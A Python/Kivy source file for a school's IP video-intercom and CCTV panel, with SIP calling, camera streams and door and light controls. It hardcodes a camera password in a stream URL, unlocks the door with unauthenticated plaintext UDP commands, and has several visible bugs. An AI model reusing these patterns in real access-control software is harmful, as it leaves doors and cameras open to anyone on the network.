from botones import BotonColor,BotonI,BotonLed,IconBoton,IconButton,BotonLedToggle
#VARIBLES GLOBALES DONDE DEFINIMOS LAS DIFERENRES IPS,PUERTOS DE TODOS LOS TERMINALES Y DISPOSITIVOS
#'''
EXT_USER1=6010
EXT_USER2=6013
EXT_DIRECCION=6002
EXT_XEFATURA=6003
EXT_SECRETARIA=6004
EXT_ELECTRONICA=6005
EXT_VIDEOPORTERO=6000#config.get('videoportero', 'extension')#6000
MIEXTENSION=config.get('terminal', 'extension')#6005
MIEXTENSIONP=str(config.get('terminal', 'clave'))#'p6005'
IPCENTRALITA=str(config.get('terminal', 'ipbx')) #'192.168.0.150' #IES PROVAL
PATH='./imaxes/'
PATHSOUNDS='./sons/'
PATHVIDEO='./VIDEOS/'
#'192.168.0.12' #ethernet .22 capturamos la ip de ollosip.ini y lo convertimos a string para
#que pueda ser utilizado por el programa, puesto que tiene que ser tipo string
ipelectronica=str(config.get('sistema', 'ip'))
MIIP=ipelectronica
USER2='sip:'+str(EXT_USER2)+'@'+str(IPCENTRALITA)
USER1='sip:'+str(EXT_USER1)+'@'+str(IPCENTRALITA)
DIRECCION='sip:'+str(EXT_DIRECCION)+'@'+str(IPCENTRALITA)
XEFATURA='sip:'+str(EXT_XEFATURA)+'@'+str(IPCENTRALITA)
SECRETARIA='sip:'+str(EXT_SECRETARIA)+'@'+str(IPCENTRALITA)
ELECTRONICA='sip:'+str(EXT_ELECTRONICA)+'@'+str(IPCENTRALITA)
ENTRADA_PRINCIPAL='sip:'+str(EXT_VIDEOPORTERO)+'@'+str(IPCENTRALITA)
#colocamos as direccions das que a clase phone aceptara chamadas, o resto seran rexeitadas
whitelist=[ENTRADA_PRINCIPAL]
#VARIABLES GLOBALES PRINCIPALMENTE REFERIDAS AL ESTADO DE LAS LLAMADAS DE TELEFONO
llamada_entrante=''
llamada_in=False
llamada_saliente=''
videollamada_saliente=''
llamada_extension=0
nivel_sonido_telefono=50
SCREEN_ACTIVA='OLLOSIP'
CCTV_ZOOM=1
volumen_sistema=50.0
volumen_microfono=10.0
class SonidoClick():
sound = SoundLoader.load(str(PATHSOUNDS)+'timbre_portal.wav')
def __init__(self,son):
self.sonido=son
def click(self):
if self.sound:
sound.volume=0.6
Clock.schedule_once(partial(self.suena,self.sound))
return True
def suena(self,sonido,*args):
try:
sonido.play()
return
except:
pass
#self.sound.stop()
"""
#ESTA CLASE NOS SIRVE PARA ENVIAR COMANDOS DE CONTROL, PARA ACITVAR SONIDOS EN EL MEGAFONO
COMO PARA ABRIR LA PUERTA Y ENCENDER LA LUZ DEL VIDEOPORTERO MEDIANTE EL EMPLEO DE UN
SOCKET UPD.ACTUA EN MODO CLIENTE. EL SERDIDOR SE INSTALARA EN LOS ALTAVOCES Y EN LA
UNIDAD EXTERIOR DEL VIDEOPORTERO IP
"""
class EnviaComando():
def __init__(self,ip,puerto):
BUFSIZE=1024
self.ip=ip
self.puerto=puerto
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def envia(self,comando):
direccion=(self.ip,self.puerto)
try:
self.client_socket.sendto(comando ,direccion)
except:
return False
class DisplayCctv(Image): #SEVER
url = StringProperty()
hora=StringProperty()
# pantalla=ObjectProperty(source='./imaxes/novideo600.png' )
def __init__(self, **kwargs):
#con super heredamos de la clase screen todos los atributos de esta
super( DisplayCctv, self).__init__(**kwargs)
self._image_buffer = None
self.cctv_no=Image( source='./imaxes/novideo600.png') #str(PATH)+
def on_press(self, *args):
pass
def start(self):
self.quit = False
self._thread = threading.Thread(target=self.read_stream)
self._thread.daemon = True
self._thread.start()
Clock.schedule_interval(self.update_image, 1 / 32)
def stop(self):
self.quit = True
Clock.unschedule(self.update_image)
def read_queue(self):
pass
def read_stream(self):
try:
#print(self.url)
self._image_buffer =self.cctv_no
stream = urllib.urlopen(self.url)
except:# IOError as e:
#se non se logra conectar coa camara devolve unha imaxe fixa que indique
#que non hai video na camara
self._image_buffer =self.cctv_no
self.stop()#self.quit=True
return False
bytes = b''
while not self.quit:
bytes+=stream.read(1024)
#caracteres que indican el inicio de un nuevo frame jpeg
a = bytes.find('\xff\xd8')
#caracteres que indican el final de un nuevo frame jpeg
b = bytes.find('\xff\xd9')
#comprobomas que hemos capturado los dos indicadores, se los sacamos y ya tenemos
#el frame jpeg completo
if a != -1 and b != -1:
jpg = bytes[a:b + 2]
bytes = bytes[b + 2:]
#comvertimos el frame en un objeto similar a un fichero, pero en memoria
#( en python el objeto es io.BytesIO)
data = io.BytesIO(jpg)
#creamos una imagen con los datos del frame almacenado en memoria
self._image_buffer=CoreImage(data,ext="jpeg",nocache=True,scale=0.1)
def update_image(self, *args):
im = None
im = self._image_buffer
#actualizamos la hora al mismo tiempo que la imagen, en caso contrario la fecvha
#y hora se sobreimpresiona so unha vez
# con esto le sacamos los tres ultimos caracteres del string
self.hora= str(datetime.datetime.now())[:-3]
self._image_buffer = None
if im is not None:
self.texture = im.texture
self.texture_size = im.texture.size
########### fin clase DisplayCctv
class CamaraCctv(ButtonBehavior,AnchorLayout):
nombre=StringProperty()
h=StringProperty()
url = StringProperty()
#print(url)
def on_press(self, *args):
pass
def start(self):
self.ids.camara.start()
def stop(self):
self.ids.camara.stop()
def actualiza_hora(self,*args):
self.h=self.ids.camara.hora
#print(self.ids.camara.height)
#print(self.ids.camara.texture.x)
Builder.load_string("""
<CamaraCctv>:
# con anchor_x e anchor_y conseguimos que los widgets que se coloquen
#dentro de la capa anchor layout se situen en la posicion que queramos
#en este caso arrriba a la izquierda
anchor_x:'center'
anchor_y:'top'
DisplayCctv:
id:camara
texture:self.texture
url:root.url
on_hora:root.actualiza_hora(args[0])
BoxLayout:
orientation:'horizontal'
pos_hint:None,None
size_hint:0.9,0.2
pos:0,10
Label:
size_hint:1,0.4
markup:True
text:root.nombre
font_size:self.width*0.1
halign:'center'
color:0.5,0.5,0.5,1
Label:
size_hint:1,0.4
font_size:self.width*0.065
text:root.h
halign:'left'
""")
class Phone(EventDispatcher):
volumen_altavoz=NumericProperty(25.0)
def __init__(self, username='', password='', camera='', snd_capture='', snd_playback='',**kwargs):
#REGISTRAMOS LOS EVENTOS CREADOS CON NUESTROS NOMBRES QUE LUEGO UTILIZAMOS
#EN EL RESTO DE LAS SCREENS CON KIVY
self.register_event_type('on_registrar')
self.register_event_type('on_noregistrado')
self.register_event_type('on_llamada_entrante')
self.register_event_type('on_llamada_terminada')
self.register_event_type('on_llamada_atendida')
super(Phone, self).__init__(**kwargs)
self.quit = BooleanProperty(False)
self.quit_when_registered=False
self.pausa=False
self.whitelist = whitelist
#ACTIVAR PARA LA VERSION 3.9.1#####################################################
self.callbacks = {
'global_state_changed': self.global_state_changed,
'call_state_changed': self.call_state_changed,
'registration_state_changed':self.registration_state_changed,
}
# #################################################################################
#Los callbacks se utilizan en linphone para atender las diferentes tareas
#por si hay una llamada entrante
# Configure the linphone core
signal.signal(signal.SIGINT, self.signal_handler)
#ACTIVAR PARA LA VERSION 3.9.1#####################################################
self.core = linphone.Core.new(self.callbacks, None, None)
self.registrada=False
self.core.max_calls = 1
self.core.echo_cancellation_enabled =False
self.core.video_capture_enabled = False
self.core.video_display_enabled = False
self.core.capture_device = 'ALSA: USB PnP Sound Device'
self.core.playback_device ='ALSA: default device'
self.core.ringer_device='default device'
self.core.video_device = 'V4L2: /dev/video0'
self.core.ring=str(PATHSOUNDS)+'timbre_portal.wav'#'synth.wav'
self.core.ring_level=0
self.core.mic_gain_db=5.0
#MIS VARIABLES
self.llamada_entrante=False
self.configure_sip_account(username, password)
def signal_handler(self, signal, frame):
self.core.terminate_all_calls()
self.quit = True
def global_state_changed(*args, **kwargs):
pass
#print("global_state_changed: %r %r" % (args, kwargs))
def registration_state_changed(self, core,proxy,state, message):
global registrada
if self.quit_when_registered:
if state == linphone.RegistrationState.Ok:
#print( 'Registro de cuenta OK')
#print('%s',self.core.proxy_config_list)
self.core.config.sync()
self.quit = True
registrada=True
self.dispatch('on_registrar')
elif linphone.RegistrationState.Failed:
#print( 'Registro de cuenta FALLO')
#print ('Registro de cuenta FALLO: {0}'.format(message))
self.dispatch('on_noregistrado')
self.quit = True
registrada=False
"""
linphone.CallState.
Idle Initial call state
IncomingReceived This is a new incoming call
OutgoingInit An outgoing call is started
OutgoingProgress An outgoing call is in progress
OutgoingRinging An outgoing call is ringing at remote end
OutgoingEarlyMedia An outgoing call is proposed early media
Connected Connected, the call is answered
StreamsRunning The media streams are established and running
Pausing The call is pausing at the initiative of local end
Paused The call is paused, remote end has accepted the pause
Resuming The call is being resumed by local end
Refered The call is being transfered to another party,
resulting in a new outgoing call to follow immediately
Error The call encountered an error
End The call ended normally
PausedByRemote The call is paused by remote end
UpdatedByRemote The calls parameters change is requested by remote end,
used for example when video is added by remote
IncomingEarlyMedia We are proposing early media to an incoming call
Updating A call update has been initiated by us
Released The call object is no more retained by the core
EarlyUpdatedByRemote
EarlyUpdating
"""
def call_state_changed(self, core, call, state, message):
global llamada_entrante
global llamada_extension
global llamada_in
if state == linphone.CallState.IncomingReceived :
self.llamada=call
if call.remote_address.as_string_uri_only() in self.whitelist:
llamada_entrante=call.remote_address.as_string()
llamada_extension=re.search(r'\d+',llamada_entrante).group()
#pasamos el string a numero de extension
llamada_extension=int(llamada_extension)
#extraemos de la direccion del que llama
#print( llamada_extension)
self.dispatch('on_llamada_entrante')
llamada_in=True
else:
llamada_in=False
core.decline_call(call, linphone.Reason.Declined)
self.dispatch('on_llamada_terminada')
logging.info( 'LLAMADA ENTRANTE RECHAZADA')
chat_room = core.get_chat_room_from_uri(self.whitelist[0])
msg = chat_room.create_message(call.remote_address_as_string + ' intento llamar')
chat_room.send_chat_message(msg)
if state == linphone.CallState.End:
self.dispatch('on_llamada_terminada')
llamada_in=False
if state== linphone.CallState.Connected:
self.dispatch('on_llamada_atendida')
def enviardtmf(self,*args):
self.current_call.send_dtmf(52)
logging.info('TONO DTMF ENVIADO')
def llamada_recibida(self):
if linphone.CallState.IncomingReceived:
return True
## FUNCION PARA COGER LA LLAMADA CUANDO PULSAMOS EL BOTON DE DESCOLGAR
def on_registrar(self, *args):
pass
def on_noregistrado(self, *args):
pass
def on_llamada_entrante(self, *args):
pass
def on_llamada_terminada(self, *args):
pass
def on_llamada_atendida(self, *args):
pass
def on_volumen_altavoz(self,*args):
volumen_sistema= self.volumen_altavoz
if llamada_in==True:
#se ai unha chamada en curso actualiza o volumen de saida do audio da chamada
self.llamada.speaker_volume_gain=volumen_sistema
#print(volumen_sistema)
def descolgar(self,*args):
global volumen_sistema
if llamada_in==True:
params = self.core.create_call_params(self.llamada)
self.core.accept_call_with_params(self.llamada, params)
#especifica el volumen de salida del audio de la llamada
self.llamada.speaker_volume_gain=volumen_sistema
def colgar(self,*args):
llamada_in=False
self.core.terminate_all_calls()
def llamar(self,number):
# None para crear una nueva llamada, recogemos los parametros en params y se los
#pasamos a la invitacion de llamada junto con la direccion sip a la que queremos llamar
params = self.core.create_call_params(None)
self.llamada=self.core.invite_with_params('sip:'+str(number)+'@'+str(IPCENTRALITA), params)
def pausar(self,*args):
self.core.play_file=(str(PATHSOUNDS)+'synth.wav')
if self.pausa:
self.pausa=False
self.core.resume_call(self.llamada)
else:
self.core.pause_call(self.llamada)
self.pausa=True
def configure_sip_account(self, username, password):
# Configure the SIP account
self.quit_when_registered=True
#print( 'CONFIGURANDO CUENTA SIP')
self.proxy_cfg = self.core.create_proxy_config()
self.proxy_cfg.identity_address = self.core.create_address('sip:'+str(username)+'@'+str(IPCENTRALITA))
self.proxy_cfg.server_addr = 'sip:'+str(IPCENTRALITA)+':5060;transport=udp'
self.proxy_cfg.register_enabled = True
self.core.add_proxy_config(self.proxy_cfg)
auth_info = self.core.create_auth_info(username, None, password, None, None, 'asterix')
self.core.add_auth_info(auth_info)
#print( 'CUENTA REGISTRADA SIP')
def eliminar_registro(self, username, password):
self.proxy_cfg.edit()
self.configure_sip_account(username, password)
def activar_registro(self):
self.proxy_cfg.done()
def mute(self):
global nivel_sonido_telefono
self.core.ring_level=0
def un_mute(self):
self.core.ring_level=nivel_sonido_telefono
def registro(self,*args):
if self.registrada:
return True
else:
return False
#ESTE ES EL BUCLE PRINCIPAL DE LINPHONE QUE DEBE SER LLAMADO PERIOICAMENTE.
#HEMOS FIJADO 11 VECES X S
def run(self,*args):
self.core.iterate()
def start(self):
Clock.schedule_interval(self.run, 1 / 11)
class MjpegCCtv(ButtonBehavior,Image):
url = StringProperty()
cctv_no=Image( source='./imaxes/novideo600.png')
def on_press(self, *args):
pass
def start(self):
self.quit = False
self._queue = deque()
self._thread = threading.Thread(target=self.read_stream)
self._thread.start()
self._image_buffer = None
Clock.schedule_interval(self.update_image, 1 / 30)
def stop(self):
self.quit = True
Clock.unschedule(self.update_image)
def read_queue(self):
pass
def read_stream(self):
try:
self._image_buffer =self.cctv_no
stream = urllib.urlopen(self.url)
except:
self._image_buffer =self.cctv_no
self.quit=True
bytes = ''
while not self.quit:
bytes+=stream.read(1024)
a = bytes.find('\xff\xd8')
b = bytes.find('\xff\xd9')
if a != -1 and b != -1:
jpg = bytes[a:b + 2]
bytes = bytes[b + 2:]
data = io.BytesIO(jpg)
im = CoreImage(data,ext="jpeg",nocache=True,scale=0.5)
self._image_buffer = im
return
def update_image(self, *args):
im = None
im = self._image_buffer
self._image_buffer = None
if im is not None:
self.texture = im.texture
self.texture_size = im.texture.size
#CONTROL DE VIDEOPORTERO
class Videoportero_screen(Screen):
def __init__(self, **kwargs):
#con super heredamos de la clase screen todos los atributos de esta
super( Videoportero_screen, self).__init__(**kwargs)
global volumen_microfono
global volumen_altavoz
IPVIDEOPORTEROEXT=config.get('videoportero', 'ipvideoportero')
PORTOVIDEOPORTERO=config.get('videoportero', 'puerto')
#print(IPVIDEOPORTEROEXT)
capa= BoxLayout(size_hint=(None,None),size=(800, 480),orientation='vertical')
with capa.canvas.before:
rect = Rectangle(source=str(PATH)+'fondo41.png',size=capa.size, pos=capa.pos)
capa.opacity=1
#debe ser FloatLayout para que el widget BotonLed funcione
capa2= FloatLayout(size_hint=(None,None),size=(800, 440),pos=(0,0))
capa1=RelativeLayout(pos_hint_x=None,size_hint_x=None,size=(800, 40),pos=(0,440))
self.capacamara=BoxLayout(size_hint=(None,None),size=(490, 400),pos=(5,60))
with capa1.canvas.before:
Color(0.15,0.15,15,0.1)
self.r1=Rectangle(size=capa1.size, pos=capa1.pos)
atras=BotonI( imagen=str(PATH)+'casa_white.png',size_hint_x=0.1,pos=(750,0),size=(35,35),trasparencia=0.2)
self.imagencon = Image( source=str(PATH)+'load3.gif',size_hint_x=None,pos=(10,0),opacity=0.2)
self.imagencon.anim_delay=0
self.textocon = Label(text='Conectando',bold = True,font_size=18,color=[1,1,1,1],size_hint_x=None,pos=(90,0))
reloj=DigitalClock(size_hint_x=0.3, pos=(500,0),font_size=24, style='cool', halign='right', valign='middle')
capa1.add_widget(self.imagencon)
capa1.add_widget(self.textocon)
capa1.add_widget(reloj)
capa1.add_widget(atras)
#CAPA PARA INFO,RELOJ ETC COLOCADA EN LA PARTE SUPERIOR DE LA PANTALLA
capa.add_widget(capa1)
self.CAM1=BotonLedToggle(pos=(600,300),size=(200,100),imagen=str(PATH)+'camara_white.png',text='',opacity=0.7)
self.ABRIR=BotonLed(pos=(600,200),size=(200,100),imagen=str(PATH)+'chave2.png',text='',opacity=0.7,group='zona')
self.LUZ=BotonLed(pos=(600,100),size=(200,100),imagen=str(PATH)+'luz_white.png',text='',opacity=0.7,group='zona')
self.MUTE=BotonLedToggle(pos=(600,0),size=(200,100),imagen=str(PATH)+'mute_white.png',text='',opacity=0.7,group='zona',state="down")
self.HABLAR=BotonColor(pos=(500,0),size=(100,400),imagen=str(PATH)+'micro_white.png',text=' ',opacity=0.4)
capa2.add_widget(self.MUTE)
capa2.add_widget(self.LUZ)
capa2.add_widget(self.ABRIR)
capa2.add_widget(self.HABLAR)
capa2.add_widget(self.CAM1)
self.camaraip= MjpegCCtv(url='http://videoportero:proval@'+str(IPVIDEOPORTEROEXT)+':'+str(PORTOVIDEOPORTERO)+'/?action=stream')
self.ImagenVideo = Image( source=str(PATH)+'novideoip.png')
self.micamara=self.ImagenVideo
self.capacamara.add_widget(self.micamara)
capa2.add_widget(self.capacamara)
capacontroles=BoxLayout(orientation='horizontal',size_hint=(None,None),size=(500, 40),pos=(0,0))
self.Imic=Image( source=str(PATH)+'Mic32.png',size_hint=(None,1),pos=(0,0))
self.volumeMic = Slider(value=volumen_microfono,pos=(0,40),value_track=True,
value_track_color=[0, 0, 1, 0.5],
value_track_width=3,border_horizontal= [0, 10, 0, 10],cursor_size=(16,20),
orientation='horizontal',min=0, max =15)
self.volumeMic.bind(value=self.volumen_mic)
self.Ialtavoz=Image( source=str(PATH)+'speaker32.png',size_hint=(None,1),pos=(0,0))
self.volumeAltavoz = Slider(value=volumen_microfono,pos=(0,40),value_track=True,
value_track_color=[0, 0, 1, 0.5],value_track_width=3,
border_horizontal= [0, 10, 0, 10],cursor_size=(16,20),
orientation='horizontal',min=0, max =100)
self.volumeAltavoz.bind(value=self.volumen_altavoz)
capacontroles.add_widget(self.Imic)
capacontroles.add_widget(self.volumeMic)
capacontroles.add_widget(self.Ialtavoz)
capacontroles.add_widget(self.volumeAltavoz)
capa2.add_widget(capacontroles)
capa.add_widget(capa2) #EL RESTO DE LA PANTALLA[]
telefono1.start()
#empleamos el evento creado on_registrar en la clase Phone
telefono1.bind(on_registrar=self.registrado)
#empleamos el evento creado on_registrar en la clase Phone
telefono1.bind(on_noregistrado=self.noregistrado)
#anado la capa que contiene todos los widgets creados al propio ,self, screen Principal_screen
self.add_widget(capa)
atras.bind(on_press=self.cambio)
self.CAM1.bind(on_press=self.controlcamara)
self.MUTE.bind(on_press=self.control_mute)
self.HABLAR.bind(on_release=self.descolgar)
self.LUZ.bind(on_press=self.control_luz)
self.ABRIR.bind(on_press=self.abrir)
self.ABRIR.bind(on_release=self.cerrar)
self.comando=EnviaComando(str(IPVIDEOPORTEROEXT),EXT_VIDEOPORTERO)
#self.sonido=SonidoClick('timbre_portal.wav')
#CONTROL DE VIDEOPORTERO
def volumen_mic(self,*args):
telefono1.core.mic_gain_db= self.volumeMic.value
volumen_microfono=self.volumeMic.value
def volumen_altavoz(self,*args):
telefono1.core.ring_level= int(self.volumeAltavoz.value)#cambia el volumen del ring del linphone
volumen_altavoz=self.volumeAltavoz.value
def descolgar(self,*args):
global llamada_in
#EN ESTE CASO SE ENTRA EN EL MENU CUANDO ALGUIEN TIMBRA
if llamada_in:
if self.HABLAR.state=="down":
telefono1.descolgar()
else:
telefono1.colgar()
self.desactivacamara()
#se va a la screen con nombre OLLOSIP
self.manager.current = SCREEN_ACTIVA
#EN ESTE OTRO CASO ES CUANDO ENTRAMOS DESDE EL MENU PRINCIPAL SIN LA EXISTENCIA
#DE LLAMADA AL VIDEOPORTERO
else:
if self.HABLAR.state=="down":
telefono1.llamar(EXT_VIDEOPORTERO)
else:
telefono1.colgar()
self.desactivacamara()
#CONTROL DE VIDEOPORTERO
def control_mute(self,*args):
if self.MUTE.state=='normal':
self.MUTE.imaxe=str(PATH)+'mute_off.png'
telefono1.mute()#core.ring_level=0
volumen_altavoz=0
else:
telefono1.un_mute()
self.MUTE.imaxe=str(PATH)+'mute_white.png'
pass
def control_luz(self,*args):
self.comando.envia('ENCIENDE LUZ')
def abrir(self,*args):
self.comando.envia('ABRE PUERTA')
def cerrar(self,*args):
self.comando.envia('CIERRA PUERTA')
def controlcamara(self,*args):
if self.CAM1.state=="down":
self.activacamara()
else:
self.desactivacamara()
def activacamara(self,*args):
self.CAM1.state="down"
self.capacamara.remove_widget(self.micamara)
self.camaraip.start()
self.micamara=self.camaraip
self.capacamara.add_widget(self.micamara)
#self.sonido.click()
def desactivacamara(self,*args):
self.CAM1.state="normal"
self.capacamara.remove_widget(self.micamara)
self.camaraip.stop()
self.micamara=self.ImagenVideo
self.capacamara.add_widget(self.micamara)
#CONTROL DE VIDEOPORTERO
def registrado(self,*args):
self.imagencon.source=str(PATH)+'ledverde18.png'
self.textocon.text='Conectado'
def noregistrado(self,*args):
self.imagencon.source=str(PATH)+'load3.gif'
self.textocon.text='Conectando'
# este metodo es llamado cada vez que SALIMOS en esta pantalla FORMA
#PARTE DE LOS METODOS DEL SCREEN MAGAGER
def on_leave(self):
#NOS ASEGURAMOS DE APAGAR EL MICROFONO EN EL CASO DE SALIR DE LA PANTALLA
self.HABLAR.state="normal"
telefono1.colgar()
self.comando.envia('CIERRA PUERTA')
self.CAM1.state="normal"
self.camaraip.stop()
#CONTROL DE VIDEOPORTERO
def on_enter(self):
global llamada_entrante
global llamada_in
if llamada_in:
self.activacamara()
def cambio(self,*args):
self.manager.current = 'OLLOSIP' #se va a la screen con nombre OLLOSIP
#CONTROL DE VIDEOPORTERO
class Camara_screen(Screen):
url=StringProperty()
nombre=StringProperty('')
Builder.load_string("""
<Camara_screen>:
on_enter:self.ids.camzoom.start()
on_leave:self.ids.camzoom.stop()
CamaraCctv:
id:camzoom
nombre:root.nombre#app.sm.get_screen('CCTV').camara_nombre
##accedemos a la variable camara_zoon de la clase Cctv_screen donde asignamos
#la camara que queremos ver en zoom en esta clase
##para ello usamos el metodo get_screen para acceder a otra clase screen desde esta
url: root.url
on_press:root.manager.current= 'CCTV'
""")
class Cctv_screen(Screen):
#declaramos una lista property donde tendremos las url de las camaras de seguridad.
#En el caso de que cambiemos la ip automaticamente se actualizara en nuestro codigo
#kv mas abajo
numero_de_camaras=NumericProperty(4)
lista_camaras=ListProperty(['','','','','','','','','',''])
uno=''
camara_url= StringProperty()
camara_nombre= StringProperty()
ocultar_menu=BooleanProperty(True)
nomecam2= StringProperty()
nomecam3= StringProperty()
nomecam4= StringProperty()
nomecam5= StringProperty()
nomecam6= StringProperty()
nomecam7= StringProperty()
nomecam8= StringProperty()
nomecam9= StringProperty()
def on_config(self):
pass
def configcamaras(self,config,none,section,key,value):
if (section == "camaras"):
if key=='nomecam1':
self.nomecam1=value
# creamos un diccionario llamado camara donde almacenamos la url y el nombre
#de la camara que queramos poner a pantalla
#completa cuando pulsemos en una de ellas
def __init__(self, **kwargs):
#con super heredamos de la clase screen todos los atributos de esta
super( Cctv_screen, self).__init__(**kwargs)
self.nomecam1= StringProperty()
self.configuracion_camaras()
self.lista_camaras[1]='http://'+str(self.usercam1)+':'+str(self.clave1)+'@'+str(self.ipcamara1)+':'+str(self.porto1)+'/video'
self.lista_camaras[2]='http://'+str(self.usercam2)+':'+str(self.clave2)+'@'+str(self.ipcamara2)+':'+str(self.porto2)+'/video'
self.lista_camaras[3]='http://'+str(self.usercam3)+':'+str(self.clave3)+'@'+str(self.ipcamara3)+':'+str(self.porto3)+'/video'
self.lista_camaras[4]='http://'+str(self.usercam4)+':'+str(self.clave4)+'@'+str(self.ipcamara4)+':'+str(self.porto4)+'/video'
self.lista_camaras[5]='http://'+str(self.usercam5)+':'+str(self.clave5)+'@'+str(self.ipcamara5)+':'+str(self.porto5)+'/video'
self.lista_camaras[6]='http://'+str(self.usercam6)+':'+str(self.clave6)+'@'+str(self.ipcamara6)+':'+str(self.porto6)+'/video'
self.lista_camaras[7]='http://'+str(self.usercam7)+':'+str(self.clave7)+'@'+str(self.ipcamara7)+':'+str(self.porto7)+'/video'
self.lista_camaras[8]='http://'+str(self.usercam8)+':'+str(self.clave8)+'@'+str(self.ipcamara8)+':'+str(self.porto8)+'/video'
self.lista_camaras[9]='http://'+str(self.usercam9)+':'+str(self.clave9)+'@'+str(self.ipcamara9)+':'+str(self.porto9)+'/video'
def on_nomecam1(self,*args):
pass
def configuracion_camaras(self,*args):
#lemos de novo o arquivo por se houbo algun cambio na configuracion
config.read('ollosip.ini')
self.ipcamara1=config.get('camaras', 'ipcam1')
self.porto1 = config.get('camaras', 'porto1')
self.usercam1 = config.get('camaras', 'usercam1')
self.clave1 = config.get('camaras', 'clave1')
self.oncam1 = config.get('camaras', 'oncam1')
self.nomecam1=config.get('camaras', 'nomecam1')
#print(self.nomecam1)
self.ipcamara2=config.get('camaras', 'ipcam2')
self.porto2 = config.get('camaras', 'porto2')
self.usercam2 = config.get('camaras', 'usercam2')
self.clave2 = config.get('camaras', 'clave2')
self.oncam2 = config.get('camaras', 'oncam2')
self.nomecam2=config.get('camaras', 'nomecam2')
self.ipcamara3=config.get('camaras', 'ipcam3')
self.porto3 = config.get('camaras', 'porto3')
self.usercam3 = config.get('camaras', 'usercam3')
self.clave3 = config.get('camaras', 'clave3')
self.oncam3 = config.get('camaras', 'oncam3')
self.nomecam3=config.get('camaras', 'nomecam3')
self.ipcamara4=config.get('camaras', 'ipcam4')
self.porto4 = config.get('camaras', 'porto4')
self.usercam4 = config.get('camaras', 'usercam4')
self.clave4 = config.get('camaras', 'clave4')
self.oncam4 = config.get('camaras', 'oncam4')
self.nomecam4=config.get('camaras', 'nomecam4')
self.ipcamara5=config.get('camaras', 'ipcam5')
self.porto5 = config.get('camaras', 'porto5')
self.usercam5 = config.get('camaras', 'usercam5')
self.clave5 = config.get('camaras', 'clave5')
self.oncam5 = config.get('camaras', 'oncam5')
self.nomecam5=config.get('camaras', 'nomecam5')
self.ipcamara6=config.get('camaras', 'ipcam6')
self.porto6 = config.get('camaras', 'porto6')
self.usercam6 = config.get('camaras', 'usercam6')
self.clave6 = config.get('camaras', 'clave6')
self.oncam6 = config.get('camaras', 'oncam6')
self.nomecam6=config.get('camaras', 'nomecam6')
self.ipcamara7=config.get('camaras', 'ipcam7')
self.porto7 = config.get('camaras', 'porto7')
self.usercam7 = config.get('camaras', 'usercam7')
self.clave7 = config.get('camaras', 'clave7')
self.oncam7 = config.get('camaras', 'oncam7')
self.nomecam7=config.get('camaras', 'nomecam7')
self.ipcamara8=config.get('camaras', 'ipcam8')
self.porto8 = config.get('camaras', 'porto8')
self.usercam8 = config.get('camaras', 'usercam8')
self.clave8 = config.get('camaras', 'clave8')
self.oncam8 = config.get('camaras', 'oncam8')
self.nomecam8=config.get('camaras', 'nomecam8')
self.ipcamara9=config.get('camaras', 'ipcam9')
self.porto9 = config.get('camaras', 'porto9')
self.usercam9 = config.get('camaras', 'usercam9')
self.clave9 = config.get('camaras', 'clave9')
self.oncam9 = config.get('camaras', 'oncam9')
self.nomecam9=config.get('camaras', 'nomecam9')
def on_numero_de_camaras(self,*args):
if self.numero_de_camaras==4:
self.camaras_9off()
self.camaras_4()
else:
self.camaras_4off()
self.camaras_9()
pass
def on_enter(self):
self.configuracion_camaras()
if self.numero_de_camaras==4:
self.camaras_4(self)
else:
self.camaras_9(self)
def on_leave(self):
if self.numero_de_camaras==4:
self.camaras_4off()
else:
self.camaras_9off()
def camaras_4(self,*args):
self.ids.camarascctv.clear_widgets()
self.ids.camarascctv.cols=2
self.ids.camarascctv.row=2
self.camara1=CamaraCctv(url=self.lista_camaras[1],nombre=self.nomecam1)
self.ids.camarascctv.add_widget(self.camara1)
self.camara1.bind(on_press=partial(self.camara_zoom,self.camara1.nombre,self.camara1.url))
self.camara1.start()
self.camara2=CamaraCctv(url=self.lista_camaras[2],nombre=self.nomecam2)
self.ids.camarascctv.add_widget(self.camara2)
self.camara2.bind(on_press=partial(self.camara_zoom,self.camara2.nombre,self.camara2.url))
self.camara3=CamaraCctv(url=self.lista_camaras[3],nombre=self.nomecam3)
self.ids.camarascctv.add_widget(self.camara3)
self.camara3.bind(on_press=partial(self.camara_zoom,self.camara3.nombre,self.camara3.url))
self.camara4=CamaraCctv(url=self.lista_camaras[4],nombre=self.nomecam4)
self.ids.camarascctv.add_widget(self.camara4)
self.camara4.bind(on_press=partial(self.camara_zoom,self.camara4.nombre,self.camara4.url))
self.camaras_4on()
def camaras_9(self,*args):
self.ids.camarascctv.clear_widgets()
self.ids.camarascctv.cols=3
self.ids.camarascctv.row=3
self.camara1=CamaraCctv(url=self.lista_camaras[1],nombre=self.nomecam1)
self.ids.camarascctv.add_widget(self.camara1)
self.camara1.bind(on_press=partial(self.camara_zoom,self.camara1.nombre,self.camara1.url))
self.camara2=CamaraCctv(url=self.lista_camaras[2],nombre=self.nomecam2)
self.ids.camarascctv.add_widget(self.camara2)
self.camara2.bind(on_press=partial(self.camara_zoom,self.camara2.nombre,self.camara2.url))
self.camara3=CamaraCctv(url=self.lista_camaras[3],nombre=self.nomecam3)
self.ids.camarascctv.add_widget(self.camara3)
self.camara3.bind(on_press=partial(self.camara_zoom,self.camara3.nombre,self.camara3.url))
self.camara4=CamaraCctv(url=self.lista_camaras[4],nombre=self.nomecam4)
self.ids.camarascctv.add_widget(self.camara4)
self.camara4.bind(on_press=partial(self.camara_zoom,self.camara4.nombre,self.camara4.url))
self.camara5=CamaraCctv(url=self.lista_camaras[5],nombre=self.nomecam5)
self.ids.camarascctv.add_widget(self.camara5)
self.camara5.bind(on_press=partial(self.camara_zoom,self.camara5.nombre,self.camara5.url))
self.camara6=CamaraCctv(url=self.lista_camaras[6],nombre=self.nomecam6)
self.ids.camarascctv.add_widget(self.camara6)
self.camara6.bind(on_press=partial(self.camara_zoom,self.camara6.nombre,self.camara6.url))
self.camara7=CamaraCctv(url=self.lista_camaras[7],nombre=self.nomecam7)
self.ids.camarascctv.add_widget(self.camara7)
self.camara7.bind(on_press=partial(self.camara_zoom,self.camara7.nombre,self.camara7.url))
self.camara8=CamaraCctv(url=self.lista_camaras[8],nombre=self.nomecam8)
self.ids.camarascctv.add_widget(self.camara8)
self.camara8.bind(on_press=partial(self.camara_zoom,self.camara8.nombre,self.camara8.url))
self.camara9=CamaraCctv(url=self.lista_camaras[9],nombre=self.nomecam9)
self.ids.camarascctv.add_widget(self.camara9)
